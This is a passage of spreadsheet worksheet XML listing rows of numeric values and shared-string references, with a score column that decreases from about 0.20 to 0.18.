        <v>24178.0</v>
      </c>
      <c r="B5146" s="2">
        <v>1.0214199E7</v>
      </c>
      <c r="C5146" s="2" t="s">
        <v>4927</v>
      </c>
      <c r="D5146" s="2">
        <v>1.0</v>
      </c>
      <c r="E5146" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5146" s="2">
        <v>0.2045751633986928</v>
      </c>
    </row>
    <row r="5147" ht="15.75" customHeight="1">
      <c r="A5147" s="1">
        <v>27076.0</v>
      </c>
      <c r="B5147" s="2">
        <v>2.0453596E7</v>
      </c>
      <c r="C5147" s="2" t="s">
        <v>4928</v>
      </c>
      <c r="D5147" s="2">
        <v>1.0</v>
      </c>
      <c r="E5147" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5147" s="2">
        <v>0.2039930555555556</v>
      </c>
    </row>
    <row r="5148" ht="15.75" customHeight="1">
      <c r="A5148" s="1">
        <v>34026.0</v>
      </c>
      <c r="B5148" s="2">
        <v>9519241.0</v>
      </c>
      <c r="C5148" s="2" t="s">
        <v>4929</v>
      </c>
      <c r="D5148" s="2">
        <v>1.0</v>
      </c>
      <c r="E5148" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5148" s="2">
        <v>0.2019607843137255</v>
      </c>
    </row>
    <row r="5149" ht="15.75" customHeight="1">
      <c r="A5149" s="1">
        <v>29195.0</v>
      </c>
      <c r="B5149" s="2">
        <v>3.0739087E7</v>
      </c>
      <c r="C5149" s="2" t="s">
        <v>4930</v>
      </c>
      <c r="D5149" s="2">
        <v>1.0</v>
      </c>
      <c r="E5149" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5149" s="2">
        <v>0.2008547008547008</v>
      </c>
    </row>
    <row r="5150" ht="15.75" customHeight="1">
      <c r="A5150" s="1">
        <v>27155.0</v>
      </c>
      <c r="B5150" s="2">
        <v>2.0791045E7</v>
      </c>
      <c r="C5150" s="2" t="s">
        <v>4931</v>
      </c>
      <c r="D5150" s="2">
        <v>1.0</v>
      </c>
      <c r="E5150" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5150" s="2">
        <v>0.2006944444444445</v>
      </c>
    </row>
    <row r="5151" ht="15.75" customHeight="1">
      <c r="A5151" s="1">
        <v>29382.0</v>
      </c>
      <c r="B5151" s="2">
        <v>3.1840703E7</v>
      </c>
      <c r="C5151" s="2" t="s">
        <v>4932</v>
      </c>
      <c r="D5151" s="2">
        <v>1.0</v>
      </c>
      <c r="E5151" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5151" s="2">
        <v>0.2006172839506172</v>
      </c>
    </row>
    <row r="5152" ht="15.75" customHeight="1">
      <c r="A5152" s="1">
        <v>31276.0</v>
      </c>
      <c r="B5152" s="2">
        <v>4953717.0</v>
      </c>
      <c r="C5152" s="2" t="s">
        <v>4933</v>
      </c>
      <c r="D5152" s="2">
        <v>1.0</v>
      </c>
      <c r="E5152" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5152" s="2">
        <v>0.2004504504504505</v>
      </c>
    </row>
    <row r="5153" ht="15.75" customHeight="1">
      <c r="A5153" s="1">
        <v>31286.0</v>
      </c>
      <c r="B5153" s="2">
        <v>4962052.0</v>
      </c>
      <c r="C5153" s="2" t="s">
        <v>4934</v>
      </c>
      <c r="D5153" s="2">
        <v>1.0</v>
      </c>
      <c r="E5153" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5153" s="2">
        <v>0.1996527777777778</v>
      </c>
    </row>
    <row r="5154" ht="15.75" customHeight="1">
      <c r="A5154" s="1">
        <v>28725.0</v>
      </c>
      <c r="B5154" s="2">
        <v>2.7918738E7</v>
      </c>
      <c r="C5154" s="2" t="s">
        <v>4935</v>
      </c>
      <c r="D5154" s="2">
        <v>1.0</v>
      </c>
      <c r="E5154" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5154" s="2">
        <v>0.1994535519125683</v>
      </c>
    </row>
    <row r="5155" ht="15.75" customHeight="1">
      <c r="A5155" s="1">
        <v>30481.0</v>
      </c>
      <c r="B5155" s="2">
        <v>3.9821058E7</v>
      </c>
      <c r="C5155" s="2" t="s">
        <v>4936</v>
      </c>
      <c r="D5155" s="2">
        <v>1.0</v>
      </c>
      <c r="E5155" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5155" s="2">
        <v>0.1988636363636364</v>
      </c>
    </row>
    <row r="5156" ht="15.75" customHeight="1">
      <c r="A5156" s="1">
        <v>31783.0</v>
      </c>
      <c r="B5156" s="2">
        <v>5226014.0</v>
      </c>
      <c r="C5156" s="2" t="s">
        <v>4937</v>
      </c>
      <c r="D5156" s="2">
        <v>1.0</v>
      </c>
      <c r="E5156" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5156" s="2">
        <v>0.1984126984126985</v>
      </c>
    </row>
    <row r="5157" ht="15.75" customHeight="1">
      <c r="A5157" s="1">
        <v>28416.0</v>
      </c>
      <c r="B5157" s="2">
        <v>2.6372855E7</v>
      </c>
      <c r="C5157" s="2" t="s">
        <v>4938</v>
      </c>
      <c r="D5157" s="2">
        <v>1.0</v>
      </c>
      <c r="E5157" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5157" s="2">
        <v>0.1970486111111112</v>
      </c>
    </row>
    <row r="5158" ht="15.75" customHeight="1">
      <c r="A5158" s="1">
        <v>29756.0</v>
      </c>
      <c r="B5158" s="2">
        <v>3.4782969E7</v>
      </c>
      <c r="C5158" s="2" t="s">
        <v>4939</v>
      </c>
      <c r="D5158" s="2">
        <v>1.0</v>
      </c>
      <c r="E5158" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5158" s="2">
        <v>0.1966490299823634</v>
      </c>
    </row>
    <row r="5159" ht="15.75" customHeight="1">
      <c r="A5159" s="1">
        <v>31297.0</v>
      </c>
      <c r="B5159" s="2">
        <v>4966443.0</v>
      </c>
      <c r="C5159" s="2" t="s">
        <v>4940</v>
      </c>
      <c r="D5159" s="2">
        <v>1.0</v>
      </c>
      <c r="E5159" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5159" s="2">
        <v>0.1951058201058201</v>
      </c>
    </row>
    <row r="5160" ht="15.75" customHeight="1">
      <c r="A5160" s="1">
        <v>33001.0</v>
      </c>
      <c r="B5160" s="2">
        <v>6620905.0</v>
      </c>
      <c r="C5160" s="2" t="s">
        <v>4939</v>
      </c>
      <c r="D5160" s="2">
        <v>1.0</v>
      </c>
      <c r="E5160" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5160" s="2">
        <v>0.1948853615520283</v>
      </c>
    </row>
    <row r="5161" ht="15.75" customHeight="1">
      <c r="A5161" s="1">
        <v>20203.0</v>
      </c>
      <c r="B5161" s="2">
        <v>1.0612611E7</v>
      </c>
      <c r="C5161" s="2" t="s">
        <v>4941</v>
      </c>
      <c r="D5161" s="2">
        <v>1.0</v>
      </c>
      <c r="E5161" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5161" s="2">
        <v>0.1944444444444445</v>
      </c>
    </row>
    <row r="5162" ht="15.75" customHeight="1">
      <c r="A5162" s="1">
        <v>22374.0</v>
      </c>
      <c r="B5162" s="2">
        <v>3.502254E7</v>
      </c>
      <c r="C5162" s="2" t="s">
        <v>4942</v>
      </c>
      <c r="D5162" s="2">
        <v>1.0</v>
      </c>
      <c r="E5162" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5162" s="2">
        <v>0.1944444444444445</v>
      </c>
    </row>
    <row r="5163" ht="15.75" customHeight="1">
      <c r="A5163" s="1">
        <v>28768.0</v>
      </c>
      <c r="B5163" s="2">
        <v>2.8386998E7</v>
      </c>
      <c r="C5163" s="2" t="s">
        <v>4943</v>
      </c>
      <c r="D5163" s="2">
        <v>1.0</v>
      </c>
      <c r="E5163" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5163" s="2">
        <v>0.1944444444444445</v>
      </c>
    </row>
    <row r="5164" ht="15.75" customHeight="1">
      <c r="A5164" s="1">
        <v>30899.0</v>
      </c>
      <c r="B5164" s="2">
        <v>4.6679625E7</v>
      </c>
      <c r="C5164" s="2" t="s">
        <v>4944</v>
      </c>
      <c r="D5164" s="2">
        <v>1.0</v>
      </c>
      <c r="E5164" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5164" s="2">
        <v>0.1944444444444445</v>
      </c>
    </row>
    <row r="5165" ht="15.75" customHeight="1">
      <c r="A5165" s="1">
        <v>27702.0</v>
      </c>
      <c r="B5165" s="2">
        <v>2.3023313E7</v>
      </c>
      <c r="C5165" s="2" t="s">
        <v>4945</v>
      </c>
      <c r="D5165" s="2">
        <v>1.0</v>
      </c>
      <c r="E5165" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5165" s="2">
        <v>0.1936274509803922</v>
      </c>
    </row>
    <row r="5166" ht="15.75" customHeight="1">
      <c r="A5166" s="1">
        <v>30589.0</v>
      </c>
      <c r="B5166" s="2">
        <v>4.1199834E7</v>
      </c>
      <c r="C5166" s="2" t="s">
        <v>4946</v>
      </c>
      <c r="D5166" s="2">
        <v>1.0</v>
      </c>
      <c r="E5166" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5166" s="2">
        <v>0.1936274509803922</v>
      </c>
    </row>
    <row r="5167" ht="15.75" customHeight="1">
      <c r="A5167" s="1">
        <v>23183.0</v>
      </c>
      <c r="B5167" s="2">
        <v>5226015.0</v>
      </c>
      <c r="C5167" s="2" t="s">
        <v>4937</v>
      </c>
      <c r="D5167" s="2">
        <v>1.0</v>
      </c>
      <c r="E5167" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5167" s="2">
        <v>0.1931216931216932</v>
      </c>
    </row>
    <row r="5168" ht="15.75" customHeight="1">
      <c r="A5168" s="1">
        <v>34116.0</v>
      </c>
      <c r="B5168" s="2">
        <v>9764410.0</v>
      </c>
      <c r="C5168" s="2" t="s">
        <v>4947</v>
      </c>
      <c r="D5168" s="2">
        <v>1.0</v>
      </c>
      <c r="E5168" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5168" s="2">
        <v>0.1928571428571429</v>
      </c>
    </row>
    <row r="5169" ht="15.75" customHeight="1">
      <c r="A5169" s="1">
        <v>20522.0</v>
      </c>
      <c r="B5169" s="2">
        <v>1.3122751E7</v>
      </c>
      <c r="C5169" s="2" t="s">
        <v>4948</v>
      </c>
      <c r="D5169" s="2">
        <v>1.0</v>
      </c>
      <c r="E5169" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5169" s="2">
        <v>0.1925287356321839</v>
      </c>
    </row>
    <row r="5170" ht="15.75" customHeight="1">
      <c r="A5170" s="1">
        <v>25177.0</v>
      </c>
      <c r="B5170" s="2">
        <v>1.312275E7</v>
      </c>
      <c r="C5170" s="2" t="s">
        <v>4948</v>
      </c>
      <c r="D5170" s="2">
        <v>1.0</v>
      </c>
      <c r="E5170" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5170" s="2">
        <v>0.1925287356321839</v>
      </c>
    </row>
    <row r="5171" ht="15.75" customHeight="1">
      <c r="A5171" s="1">
        <v>30891.0</v>
      </c>
      <c r="B5171" s="2">
        <v>4.6571998E7</v>
      </c>
      <c r="C5171" s="2" t="s">
        <v>4949</v>
      </c>
      <c r="D5171" s="2">
        <v>1.0</v>
      </c>
      <c r="E5171" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5171" s="2">
        <v>0.1925287356321839</v>
      </c>
    </row>
    <row r="5172" ht="15.75" customHeight="1">
      <c r="A5172" s="1">
        <v>24940.0</v>
      </c>
      <c r="B5172" s="2">
        <v>1.249222E7</v>
      </c>
      <c r="C5172" s="2" t="s">
        <v>4950</v>
      </c>
      <c r="D5172" s="2">
        <v>1.0</v>
      </c>
      <c r="E5172" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5172" s="2">
        <v>0.1923076923076923</v>
      </c>
    </row>
    <row r="5173" ht="15.75" customHeight="1">
      <c r="A5173" s="1">
        <v>30627.0</v>
      </c>
      <c r="B5173" s="2">
        <v>4136218.0</v>
      </c>
      <c r="C5173" s="2" t="s">
        <v>4951</v>
      </c>
      <c r="D5173" s="2">
        <v>1.0</v>
      </c>
      <c r="E5173" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5173" s="2">
        <v>0.1919934640522876</v>
      </c>
    </row>
    <row r="5174" ht="15.75" customHeight="1">
      <c r="A5174" s="1">
        <v>33193.0</v>
      </c>
      <c r="B5174" s="2">
        <v>7137440.0</v>
      </c>
      <c r="C5174" s="2" t="s">
        <v>4952</v>
      </c>
      <c r="D5174" s="2">
        <v>1.0</v>
      </c>
      <c r="E5174" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5174" s="2">
        <v>0.1919831223628692</v>
      </c>
    </row>
    <row r="5175" ht="15.75" customHeight="1">
      <c r="A5175" s="1">
        <v>30548.0</v>
      </c>
      <c r="B5175" s="2">
        <v>4.0629412E7</v>
      </c>
      <c r="C5175" s="2" t="s">
        <v>4953</v>
      </c>
      <c r="D5175" s="2">
        <v>1.0</v>
      </c>
      <c r="E5175" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5175" s="2">
        <v>0.1915422885572139</v>
      </c>
    </row>
    <row r="5176" ht="15.75" customHeight="1">
      <c r="A5176" s="1">
        <v>28064.0</v>
      </c>
      <c r="B5176" s="2">
        <v>2.4606279E7</v>
      </c>
      <c r="C5176" s="2" t="s">
        <v>4954</v>
      </c>
      <c r="D5176" s="2">
        <v>1.0</v>
      </c>
      <c r="E5176" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5176" s="2">
        <v>0.191358024691358</v>
      </c>
    </row>
    <row r="5177" ht="15.75" customHeight="1">
      <c r="A5177" s="1">
        <v>25598.0</v>
      </c>
      <c r="B5177" s="2">
        <v>1.4384055E7</v>
      </c>
      <c r="C5177" s="2" t="s">
        <v>4955</v>
      </c>
      <c r="D5177" s="2">
        <v>1.0</v>
      </c>
      <c r="E5177" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5177" s="2">
        <v>0.1910197869101979</v>
      </c>
    </row>
    <row r="5178" ht="15.75" customHeight="1">
      <c r="A5178" s="1">
        <v>31008.0</v>
      </c>
      <c r="B5178" s="2">
        <v>4.7698391E7</v>
      </c>
      <c r="C5178" s="2" t="s">
        <v>4956</v>
      </c>
      <c r="D5178" s="2">
        <v>1.0</v>
      </c>
      <c r="E5178" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5178" s="2">
        <v>0.1910197869101979</v>
      </c>
    </row>
    <row r="5179" ht="15.75" customHeight="1">
      <c r="A5179" s="1">
        <v>25165.0</v>
      </c>
      <c r="B5179" s="2">
        <v>1.3079803E7</v>
      </c>
      <c r="C5179" s="2" t="s">
        <v>4957</v>
      </c>
      <c r="D5179" s="2">
        <v>1.0</v>
      </c>
      <c r="E5179" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5179" s="2">
        <v>0.1905766526019691</v>
      </c>
    </row>
    <row r="5180" ht="15.75" customHeight="1">
      <c r="A5180" s="1">
        <v>29634.0</v>
      </c>
      <c r="B5180" s="2">
        <v>3.3761611E7</v>
      </c>
      <c r="C5180" s="2" t="s">
        <v>4958</v>
      </c>
      <c r="D5180" s="2">
        <v>1.0</v>
      </c>
      <c r="E5180" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5180" s="2">
        <v>0.1903703703703704</v>
      </c>
    </row>
    <row r="5181" ht="15.75" customHeight="1">
      <c r="A5181" s="1">
        <v>20169.0</v>
      </c>
      <c r="B5181" s="2">
        <v>1.0409791E7</v>
      </c>
      <c r="C5181" s="2" t="s">
        <v>4959</v>
      </c>
      <c r="D5181" s="2">
        <v>1.0</v>
      </c>
      <c r="E5181" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5181" s="2">
        <v>0.1901041666666667</v>
      </c>
    </row>
    <row r="5182" ht="15.75" customHeight="1">
      <c r="A5182" s="1">
        <v>30777.0</v>
      </c>
      <c r="B5182" s="2">
        <v>4.4680849E7</v>
      </c>
      <c r="C5182" s="2" t="s">
        <v>4960</v>
      </c>
      <c r="D5182" s="2">
        <v>1.0</v>
      </c>
      <c r="E5182" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5182" s="2">
        <v>0.1898148148148148</v>
      </c>
    </row>
    <row r="5183" ht="15.75" customHeight="1">
      <c r="A5183" s="1">
        <v>21837.0</v>
      </c>
      <c r="B5183" s="2">
        <v>2.7095459E7</v>
      </c>
      <c r="C5183" s="2" t="s">
        <v>4961</v>
      </c>
      <c r="D5183" s="2">
        <v>1.0</v>
      </c>
      <c r="E5183" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5183" s="2">
        <v>0.1892655367231639</v>
      </c>
    </row>
    <row r="5184" ht="15.75" customHeight="1">
      <c r="A5184" s="1">
        <v>20531.0</v>
      </c>
      <c r="B5184" s="2">
        <v>1.3200715E7</v>
      </c>
      <c r="C5184" s="2" t="s">
        <v>4962</v>
      </c>
      <c r="D5184" s="2">
        <v>1.0</v>
      </c>
      <c r="E5184" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5184" s="2">
        <v>0.1892655367231638</v>
      </c>
    </row>
    <row r="5185" ht="15.75" customHeight="1">
      <c r="A5185" s="1">
        <v>26227.0</v>
      </c>
      <c r="B5185" s="2">
        <v>1.6279652E7</v>
      </c>
      <c r="C5185" s="2" t="s">
        <v>4963</v>
      </c>
      <c r="D5185" s="2">
        <v>1.0</v>
      </c>
      <c r="E5185" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5185" s="2">
        <v>0.1892655367231638</v>
      </c>
    </row>
    <row r="5186" ht="15.75" customHeight="1">
      <c r="A5186" s="1">
        <v>28602.0</v>
      </c>
      <c r="B5186" s="2">
        <v>2.7095458E7</v>
      </c>
      <c r="C5186" s="2" t="s">
        <v>4961</v>
      </c>
      <c r="D5186" s="2">
        <v>1.0</v>
      </c>
      <c r="E5186" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5186" s="2">
        <v>0.1892655367231638</v>
      </c>
    </row>
    <row r="5187" ht="15.75" customHeight="1">
      <c r="A5187" s="1">
        <v>28897.0</v>
      </c>
      <c r="B5187" s="2">
        <v>2.9329273E7</v>
      </c>
      <c r="C5187" s="2" t="s">
        <v>4964</v>
      </c>
      <c r="D5187" s="2">
        <v>1.0</v>
      </c>
      <c r="E5187" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5187" s="2">
        <v>0.1892655367231638</v>
      </c>
    </row>
    <row r="5188" ht="15.75" customHeight="1">
      <c r="A5188" s="1">
        <v>25231.0</v>
      </c>
      <c r="B5188" s="2">
        <v>1.3344806E7</v>
      </c>
      <c r="C5188" s="2" t="s">
        <v>4965</v>
      </c>
      <c r="D5188" s="2">
        <v>1.0</v>
      </c>
      <c r="E5188" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5188" s="2">
        <v>0.1888888888888889</v>
      </c>
    </row>
    <row r="5189" ht="15.75" customHeight="1">
      <c r="A5189" s="1">
        <v>24545.0</v>
      </c>
      <c r="B5189" s="2">
        <v>1.1257456E7</v>
      </c>
      <c r="C5189" s="2" t="s">
        <v>4966</v>
      </c>
      <c r="D5189" s="2">
        <v>1.0</v>
      </c>
      <c r="E5189" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5189" s="2">
        <v>0.1885245901639345</v>
      </c>
    </row>
    <row r="5190" ht="15.75" customHeight="1">
      <c r="A5190" s="1">
        <v>30502.0</v>
      </c>
      <c r="B5190" s="2">
        <v>4.0027458E7</v>
      </c>
      <c r="C5190" s="2" t="s">
        <v>4967</v>
      </c>
      <c r="D5190" s="2">
        <v>1.0</v>
      </c>
      <c r="E5190" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5190" s="2">
        <v>0.1883680555555556</v>
      </c>
    </row>
    <row r="5191" ht="15.75" customHeight="1">
      <c r="A5191" s="1">
        <v>25641.0</v>
      </c>
      <c r="B5191" s="2">
        <v>1.4502104E7</v>
      </c>
      <c r="C5191" s="2" t="s">
        <v>4968</v>
      </c>
      <c r="D5191" s="2">
        <v>1.0</v>
      </c>
      <c r="E5191" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5191" s="2">
        <v>0.1878306878306879</v>
      </c>
    </row>
    <row r="5192" ht="15.75" customHeight="1">
      <c r="A5192" s="1">
        <v>28917.0</v>
      </c>
      <c r="B5192" s="2">
        <v>2.9508889E7</v>
      </c>
      <c r="C5192" s="2" t="s">
        <v>4969</v>
      </c>
      <c r="D5192" s="2">
        <v>1.0</v>
      </c>
      <c r="E5192" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5192" s="2">
        <v>0.1878306878306879</v>
      </c>
    </row>
    <row r="5193" ht="15.75" customHeight="1">
      <c r="A5193" s="1">
        <v>33303.0</v>
      </c>
      <c r="B5193" s="2">
        <v>7491061.0</v>
      </c>
      <c r="C5193" s="2" t="s">
        <v>4970</v>
      </c>
      <c r="D5193" s="2">
        <v>1.0</v>
      </c>
      <c r="E5193" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5193" s="2">
        <v>0.1878306878306879</v>
      </c>
    </row>
    <row r="5194" ht="15.75" customHeight="1">
      <c r="A5194" s="1">
        <v>33065.0</v>
      </c>
      <c r="B5194" s="2">
        <v>6832876.0</v>
      </c>
      <c r="C5194" s="2" t="s">
        <v>4971</v>
      </c>
      <c r="D5194" s="2">
        <v>1.0</v>
      </c>
      <c r="E5194" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5194" s="2">
        <v>0.1871794871794872</v>
      </c>
    </row>
    <row r="5195" ht="15.75" customHeight="1">
      <c r="A5195" s="1">
        <v>32307.0</v>
      </c>
      <c r="B5195" s="2">
        <v>5562731.0</v>
      </c>
      <c r="C5195" s="2" t="s">
        <v>4972</v>
      </c>
      <c r="D5195" s="2">
        <v>1.0</v>
      </c>
      <c r="E5195" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5195" s="2">
        <v>0.1866319444444445</v>
      </c>
    </row>
    <row r="5196" ht="15.75" customHeight="1">
      <c r="A5196" s="1">
        <v>28962.0</v>
      </c>
      <c r="B5196" s="2">
        <v>2.9795778E7</v>
      </c>
      <c r="C5196" s="2" t="s">
        <v>4973</v>
      </c>
      <c r="D5196" s="2">
        <v>1.0</v>
      </c>
      <c r="E5196" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5196" s="2">
        <v>0.1865671641791045</v>
      </c>
    </row>
    <row r="5197" ht="15.75" customHeight="1">
      <c r="A5197" s="1">
        <v>33866.0</v>
      </c>
      <c r="B5197" s="2">
        <v>9072520.0</v>
      </c>
      <c r="C5197" s="2" t="s">
        <v>4974</v>
      </c>
      <c r="D5197" s="2">
        <v>1.0</v>
      </c>
      <c r="E5197" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5197" s="2">
        <v>0.1865079365079366</v>
      </c>
    </row>
    <row r="5198" ht="15.75" customHeight="1">
      <c r="A5198" s="1">
        <v>29004.0</v>
      </c>
      <c r="B5198" s="2">
        <v>2.99023E7</v>
      </c>
      <c r="C5198" s="2" t="s">
        <v>4975</v>
      </c>
      <c r="D5198" s="2">
        <v>1.0</v>
      </c>
      <c r="E5198" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5198" s="2">
        <v>0.1864035087719299</v>
      </c>
    </row>
    <row r="5199" ht="15.75" customHeight="1">
      <c r="A5199" s="1">
        <v>29635.0</v>
      </c>
      <c r="B5199" s="2">
        <v>3.3761611E7</v>
      </c>
      <c r="C5199" s="2" t="s">
        <v>4976</v>
      </c>
      <c r="D5199" s="2">
        <v>1.0</v>
      </c>
      <c r="E5199" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5199" s="2">
        <v>0.1862373737373737</v>
      </c>
    </row>
    <row r="5200" ht="15.75" customHeight="1">
      <c r="A5200" s="1">
        <v>23979.0</v>
      </c>
      <c r="B5200" s="2">
        <v>9106051.0</v>
      </c>
      <c r="C5200" s="2" t="s">
        <v>4977</v>
      </c>
      <c r="D5200" s="2">
        <v>1.0</v>
      </c>
      <c r="E5200" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5200" s="2">
        <v>0.1861111111111111</v>
      </c>
    </row>
    <row r="5201" ht="15.75" customHeight="1">
      <c r="A5201" s="1">
        <v>25329.0</v>
      </c>
      <c r="B5201" s="2">
        <v>1.3471365E7</v>
      </c>
      <c r="C5201" s="2" t="s">
        <v>4978</v>
      </c>
      <c r="D5201" s="2">
        <v>1.0</v>
      </c>
      <c r="E5201" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5201" s="2">
        <v>0.1861111111111111</v>
      </c>
    </row>
    <row r="5202" ht="15.75" customHeight="1">
      <c r="A5202" s="1">
        <v>28041.0</v>
      </c>
      <c r="B5202" s="2">
        <v>2.4519055E7</v>
      </c>
      <c r="C5202" s="2" t="s">
        <v>4979</v>
      </c>
      <c r="D5202" s="2">
        <v>1.0</v>
      </c>
      <c r="E5202" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5202" s="2">
        <v>0.1859567901234568</v>
      </c>
    </row>
    <row r="5203" ht="15.75" customHeight="1">
      <c r="A5203" s="1">
        <v>25575.0</v>
      </c>
      <c r="B5203" s="2">
        <v>1.4333253E7</v>
      </c>
      <c r="C5203" s="2" t="s">
        <v>4980</v>
      </c>
      <c r="D5203" s="2">
        <v>1.0</v>
      </c>
      <c r="E5203" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5203" s="2">
        <v>0.1859259259259259</v>
      </c>
    </row>
    <row r="5204" ht="15.75" customHeight="1">
      <c r="A5204" s="1">
        <v>24710.0</v>
      </c>
      <c r="B5204" s="2">
        <v>1.1670021E7</v>
      </c>
      <c r="C5204" s="2" t="s">
        <v>4981</v>
      </c>
      <c r="D5204" s="2">
        <v>1.0</v>
      </c>
      <c r="E5204" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5204" s="2">
        <v>0.1855482933914306</v>
      </c>
    </row>
    <row r="5205" ht="15.75" customHeight="1">
      <c r="A5205" s="1">
        <v>27537.0</v>
      </c>
      <c r="B5205" s="2">
        <v>2.221668E7</v>
      </c>
      <c r="C5205" s="2" t="s">
        <v>4982</v>
      </c>
      <c r="D5205" s="2">
        <v>1.0</v>
      </c>
      <c r="E5205" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5205" s="2">
        <v>0.1854700854700855</v>
      </c>
    </row>
    <row r="5206" ht="15.75" customHeight="1">
      <c r="A5206" s="1">
        <v>22887.0</v>
      </c>
      <c r="B5206" s="2">
        <v>4.7801081E7</v>
      </c>
      <c r="C5206" s="2" t="s">
        <v>4983</v>
      </c>
      <c r="D5206" s="2">
        <v>1.0</v>
      </c>
      <c r="E5206" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5206" s="2">
        <v>0.1843033509700177</v>
      </c>
    </row>
    <row r="5207" ht="15.75" customHeight="1">
      <c r="A5207" s="1">
        <v>31029.0</v>
      </c>
      <c r="B5207" s="2">
        <v>4.780108E7</v>
      </c>
      <c r="C5207" s="2" t="s">
        <v>4983</v>
      </c>
      <c r="D5207" s="2">
        <v>1.0</v>
      </c>
      <c r="E5207" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5207" s="2">
        <v>0.1843033509700177</v>
      </c>
    </row>
    <row r="5208" ht="15.75" customHeight="1">
      <c r="A5208" s="1">
        <v>23944.0</v>
      </c>
      <c r="B5208" s="2">
        <v>8840417.0</v>
      </c>
      <c r="C5208" s="2" t="s">
        <v>4984</v>
      </c>
      <c r="D5208" s="2">
        <v>1.0</v>
      </c>
      <c r="E5208" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5208" s="2">
        <v>0.1842592592592593</v>
      </c>
    </row>
    <row r="5209" ht="15.75" customHeight="1">
      <c r="A5209" s="1">
        <v>34121.0</v>
      </c>
      <c r="B5209" s="2">
        <v>9768682.0</v>
      </c>
      <c r="C5209" s="2" t="s">
        <v>4985</v>
      </c>
      <c r="D5209" s="2">
        <v>1.0</v>
      </c>
      <c r="E5209" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5209" s="2">
        <v>0.1842592592592593</v>
      </c>
    </row>
    <row r="5210" ht="15.75" customHeight="1">
      <c r="A5210" s="1">
        <v>27277.0</v>
      </c>
      <c r="B5210" s="2">
        <v>2.1229056E7</v>
      </c>
      <c r="C5210" s="2" t="s">
        <v>4986</v>
      </c>
      <c r="D5210" s="2">
        <v>1.0</v>
      </c>
      <c r="E5210" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5210" s="2">
        <v>0.1842105263157895</v>
      </c>
    </row>
    <row r="5211" ht="15.75" customHeight="1">
      <c r="A5211" s="1">
        <v>28765.0</v>
      </c>
      <c r="B5211" s="2">
        <v>2.8214871E7</v>
      </c>
      <c r="C5211" s="2" t="s">
        <v>4987</v>
      </c>
      <c r="D5211" s="2">
        <v>1.0</v>
      </c>
      <c r="E5211" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5211" s="2">
        <v>0.183982683982684</v>
      </c>
    </row>
    <row r="5212" ht="15.75" customHeight="1">
      <c r="A5212" s="1">
        <v>29542.0</v>
      </c>
      <c r="B5212" s="2">
        <v>3.2872845E7</v>
      </c>
      <c r="C5212" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="D5212" s="2">
        <v>1.0</v>
      </c>
      <c r="E5212" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5212" s="2">
        <v>0.183933933933934</v>
      </c>
    </row>
    <row r="5213" ht="15.75" customHeight="1">
      <c r="A5213" s="1">
        <v>26869.0</v>
      </c>
      <c r="B5213" s="2">
